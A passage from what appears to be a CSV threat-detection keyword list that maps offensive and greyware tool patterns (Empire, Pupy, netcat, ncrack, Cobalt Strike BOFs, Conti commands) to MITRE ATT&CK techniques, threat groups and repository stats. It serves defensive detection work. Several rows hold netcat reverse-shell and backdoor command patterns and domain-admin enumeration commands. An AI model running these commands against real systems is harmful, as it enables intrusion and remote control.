T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForceTarget*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*nbnsspoof.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*NBNSSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*nbtscan -r */24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nbtscan -r */24*,greyware_tool_keyword,nbtscan,smb enumeration,T1135 - T1046,TA0007 - TA0009,N/A,N/A,discovery,https://github.com/charlesroelli/nbtscan,1,0,N/A,5,2,124,23,2016-05-26T20:16:52Z,2016-05-26T20:16:33Z -*nbtstat -n*,greyware_tool_keyword,nbtstat,Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.,T1049 - T1018 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat,1,0,N/A,4,10,N/A,N/A,N/A,N/A -*nc * -e /bin/bash*,greyware_tool_keyword,netcat,netcat shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nc 127.0.0.1 4000*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*nc -l -p * -e *.bat*,greyware_tool_keyword,nc,Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -l -p * -e /bin/bash*,greyware_tool_keyword,nc,Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -l -p * -e cmd.exe*,greyware_tool_keyword,nc,Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -nlvp 4444*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,0,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*nc -u -lvp *,greyware_tool_keyword,netcat,netcat shell listener,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nc -v -n -z -w1 *-*,greyware_tool_keyword,nc,Port scanner with netcat,T1046,TA0007,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -vlp 4444*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*nc -vlp 4445*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*nc -z -v * *,greyware_tool_keyword,nc,netcat common arguments,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nc.exe 127.0.0.1 4444*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*nc.exe -l -p 1337*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*ncat * -e /bin/bash*,greyware_tool_keyword,netcat,ncat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*ncat * -p 4444*,greyware_tool_keyword,ncat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*ncat --udp * -e /bin/bash*,greyware_tool_keyword,netcat,ncat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nccgroup/demiguise*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,1,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*ncrack-*.dmg*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-*-setup.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*NcrackInstaller.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-master.zip*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-services*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ndDelegation.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ndp_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*Ne0nd0g/merlin*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*needle_sift.x64*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -*Needles without the Thread.pptx*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*needlesift.cna*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -*neo2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*neo4j console*,greyware_tool_keyword,bloodhound,he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,0,greyware tool - risks of False positive !,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*neo4j start*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers AllowedToDelegate to other computers,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*neo4jconnection.py*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*neoneggplant*,offensive_tool_keyword,Github Username,author of RAT tools on github,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/neoneggplant,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nessus* --set listen_address=127.0.0.1*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.deb*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.dmg*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.msi*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.rpm*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.tar.gz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.txz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessus_vulns_cleaner.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*nessuscli fetch*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessuscli fix*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessus-updates*.tar.gz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*net domain_controllers*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -"*net group ""Domain Admins"" /domain*",greyware_tool_keyword,net,Query users from domain admins in current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group *domain admins* /domain*,offensive_tool_keyword,net,Conti Ransomware Proxyshell PowerShell command #9,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,10,N/A,N/A,N/A,N/A,N/A -*net group *Domain Controllers*/domain*,greyware_tool_keyword,net,Query Domain Comtrollers Computers in the current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group *Enterprise Admins* /dom*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net group / domain *Domain Admins*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net group /domain *Domain Admins*,greyware_tool_keyword,net,Query users from domain admins in current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group administrators /domain*,greyware_tool_keyword,net,showing users in a privileged group. ,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*net localgroup admin*,greyware_tool_keyword,net,discover local admins group,T1069.001 - T1087.002,TA0007 - TA0004,N/A,N/A,Discovery,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*net localgroup administrators icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*net rpc group addmem 'Domain admins' *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 